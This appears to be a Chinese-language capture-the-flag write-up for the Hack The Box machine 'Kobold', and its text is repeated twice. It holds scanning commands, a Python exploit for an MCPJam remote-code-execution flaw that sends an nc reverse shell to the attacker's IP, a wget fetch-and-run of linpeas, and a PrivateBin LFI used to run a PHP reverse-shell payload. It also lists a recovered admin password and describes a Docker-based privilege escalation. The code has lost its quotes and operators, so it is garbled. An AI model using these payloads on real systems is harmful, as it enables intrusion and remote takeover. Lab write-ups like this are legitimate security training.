10.129.13.191nmap扫描sudo nmap --top-ports 10000 10.129.13.191 --min-rate1000 -oA ips_quick_TCP_nmapscan sudo nmap --top-ports 10000 10.129.13.191 --min-rate1000 -sU -oA ips_quick_UDP_nmapscan nmap -p- 10.129.13.191 -oA ips_full_TCP_nmapscan --min-rate1000 sudo nmap -p- 10.129.13.191 -sU -oA ips_full_UDP_nmapscan --min-rate1000我们注意到80端口说明页面还在开发阶段所以我们对其发起资产扫描发现一个用户名admin记录下来我们综合决定打算先vhost扫描然后发起目录扫描ffuf -w /home/kali/Desktop/Info/SecLists-master/SecLists-master/Discovery/DNS/subdomains-top1million-20000.txt:FUZZ -u https://kobold.htb/ -H Host: FUZZ.kobold.htb -mc all -fw 4ffuf -w /home/kali/Desktop/Info/customDic/dirsearch_dicc.txt:FUZZ -u https://kobold.htb/FUZZ -mc all -fw 3 ffuf -w /usr/share/seclists/Discovery/Web-Content/big.txt:FUZZ -u https://kobold.htb/FUZZ -e .php -mc all -fw 3 ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt:FUZZ -u https://kobold.htb/FUZZ -e .php -mc all -fw 3 ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt:FUZZ -u https://kobold.htb/FUZZ -e .php -mc all -fw 3mcpjam 中间件 RCE发现了vhostmcp通常是AI 中的工具调用协议我们访问它echo 10.129.13.191 mcp.kobold.htb | sudo tee -a /etc/hostsmcpjam是关键词我们搜索到相关的Pochttps://github.com/H1sok444/CVE-2026-23744-PoCgit clone https://github.com/H1sok444/CVE-2026-23744-PoC cd CVE-2026-23744-PoC修改脚本为如下脚本# Description : This was written for a CTF but can be used for any authorized vulnerable target # CVE : CVE-2026-23744 # Author : H1sok444 import time import requests import sys # Change this attacker_ip 10.10.15.116 port 80 def reproduce(target): print([*] Checking server...) start_time time.time() while time.time() - start_time 30: try: r requests.get(fhttps://{target}, timeout2, verifyFalse) if r.status_code in [200, 302, 403]: break except: time.sleep(1) print([] Server reachable) exploit_url fhttps://{target}/api/mcp/connect reverse_shell frm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 21|nc 10.10.15.116 80 /tmp/f payload { serverConfig: { command: /bin/sh, args: [-c, reverse_shell], env: {} }, serverId: rce_test } print([*] Sending exploit...) try: requests.post(exploit_url, jsonpayload, timeout5, verifyFalse) except: # very normal if shell connects and breaks HTTP pass print([] Payload sent, check your listener!) if __name__ __main__: if len(sys.argv) ! 2: print(fUsage: {sys.argv[0]} mcp.kobold.htb) sys.exit(1) reproduce(sys.argv[1])执行nc -lvnp 80 python3 exploit.py mcp.kobold.htb上linpeaswget http://10.10.15.116:81/linpeas.sh chmod 755 linpeas.sh ./linpeas.sh我们注意到8080端口是docker容器的映射端口发现了新的vhost且正好对应docker容器bin.kobold.htb添加vhostecho 10.129.13.191 bin.kobold.htb | sudo tee -a /etc/hosts中间件 - Privatebin - 本地 LFI我们观察到privatebin的版本号该版本号存在本地LFI问题https://github.com/PrivateBin/PrivateBin/security/advisories/GHSA-g2j9-g8r5-rg82cd /privatebin-data/data echo ?php phpinfo();? pwn.php然后我们构造如下请求包GET / HTTP/1.1 Host: bin.kobold.htb User-Agent: curl/8.15.0 Accept: */* Cookie: template../data/pwn Connection: keep-alive Referer: http://bin.kobold.htb/我们构造反连脚本echo ?php system(rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 21|nc 172.17.0.1 9001 /tmp/f);? pwn4.php然后构造如下请求包GET / HTTP/1.1 Host: bin.kobold.htb User-Agent: curl/8.15.0 Accept: */* Cookie: template../data/pwn4 Connection: keep-alive Referer: http://bin.kobold.htb/docker能力没法逃逸capsh --decode00000000a80425fb转向凭证窃取我们发现了conf文件中包含了一个密码中间件 - Arcan 滥用 - RCE - Linux 提权我们转向之前发现的3552arcane ComplexPsswordAdmin1928接着我们构造一个有毒的docker点击创建然后就成功了然后访问对应目录即可在这里插入代码片
HTB - Kobold
发布时间:2026/6/19 16:23:57
10.129.13.191nmap扫描sudo nmap --top-ports 10000 10.129.13.191 --min-rate1000 -oA ips_quick_TCP_nmapscan sudo nmap --top-ports 10000 10.129.13.191 --min-rate1000 -sU -oA ips_quick_UDP_nmapscan nmap -p- 10.129.13.191 -oA ips_full_TCP_nmapscan --min-rate1000 sudo nmap -p- 10.129.13.191 -sU -oA ips_full_UDP_nmapscan --min-rate1000我们注意到80端口说明页面还在开发阶段所以我们对其发起资产扫描发现一个用户名admin记录下来我们综合决定打算先vhost扫描然后发起目录扫描ffuf -w /home/kali/Desktop/Info/SecLists-master/SecLists-master/Discovery/DNS/subdomains-top1million-20000.txt:FUZZ -u https://kobold.htb/ -H Host: FUZZ.kobold.htb -mc all -fw 4ffuf -w /home/kali/Desktop/Info/customDic/dirsearch_dicc.txt:FUZZ -u https://kobold.htb/FUZZ -mc all -fw 3 ffuf -w /usr/share/seclists/Discovery/Web-Content/big.txt:FUZZ -u https://kobold.htb/FUZZ -e .php -mc all -fw 3 ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt:FUZZ -u https://kobold.htb/FUZZ -e .php -mc all -fw 3 ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt:FUZZ -u https://kobold.htb/FUZZ -e .php -mc all -fw 3mcpjam 中间件 RCE发现了vhostmcp通常是AI 中的工具调用协议我们访问它echo 10.129.13.191 mcp.kobold.htb | sudo tee -a /etc/hostsmcpjam是关键词我们搜索到相关的Pochttps://github.com/H1sok444/CVE-2026-23744-PoCgit clone https://github.com/H1sok444/CVE-2026-23744-PoC cd CVE-2026-23744-PoC修改脚本为如下脚本# Description : This was written for a CTF but can be used for any authorized vulnerable target # CVE : CVE-2026-23744 # Author : H1sok444 import time import requests import sys # Change this attacker_ip 10.10.15.116 port 80 def reproduce(target): print([*] Checking server...) start_time time.time() while time.time() - start_time 30: try: r requests.get(fhttps://{target}, timeout2, verifyFalse) if r.status_code in [200, 302, 403]: break except: time.sleep(1) print([] Server reachable) exploit_url fhttps://{target}/api/mcp/connect reverse_shell frm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 21|nc 10.10.15.116 80 /tmp/f payload { serverConfig: { command: /bin/sh, args: [-c, reverse_shell], env: {} }, serverId: rce_test } print([*] Sending exploit...) try: requests.post(exploit_url, jsonpayload, timeout5, verifyFalse) except: # very normal if shell connects and breaks HTTP pass print([] Payload sent, check your listener!) if __name__ __main__: if len(sys.argv) ! 2: print(fUsage: {sys.argv[0]} mcp.kobold.htb) sys.exit(1) reproduce(sys.argv[1])执行nc -lvnp 80 python3 exploit.py mcp.kobold.htb上linpeaswget http://10.10.15.116:81/linpeas.sh chmod 755 linpeas.sh ./linpeas.sh我们注意到8080端口是docker容器的映射端口发现了新的vhost且正好对应docker容器bin.kobold.htb添加vhostecho 10.129.13.191 bin.kobold.htb | sudo tee -a /etc/hosts中间件 - Privatebin - 本地 LFI我们观察到privatebin的版本号该版本号存在本地LFI问题https://github.com/PrivateBin/PrivateBin/security/advisories/GHSA-g2j9-g8r5-rg82cd /privatebin-data/data echo ?php phpinfo();? pwn.php然后我们构造如下请求包GET / HTTP/1.1 Host: bin.kobold.htb User-Agent: curl/8.15.0 Accept: */* Cookie: template../data/pwn Connection: keep-alive Referer: http://bin.kobold.htb/我们构造反连脚本echo ?php system(rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 21|nc 172.17.0.1 9001 /tmp/f);? pwn4.php然后构造如下请求包GET / HTTP/1.1 Host: bin.kobold.htb User-Agent: curl/8.15.0 Accept: */* Cookie: template../data/pwn4 Connection: keep-alive Referer: http://bin.kobold.htb/docker能力没法逃逸capsh --decode00000000a80425fb转向凭证窃取我们发现了conf文件中包含了一个密码中间件 - Arcan 滥用 - RCE - Linux 提权我们转向之前发现的3552arcane ComplexPsswordAdmin1928接着我们构造一个有毒的docker点击创建然后就成功了然后访问对应目录即可在这里插入代码片
指南(适合新手))
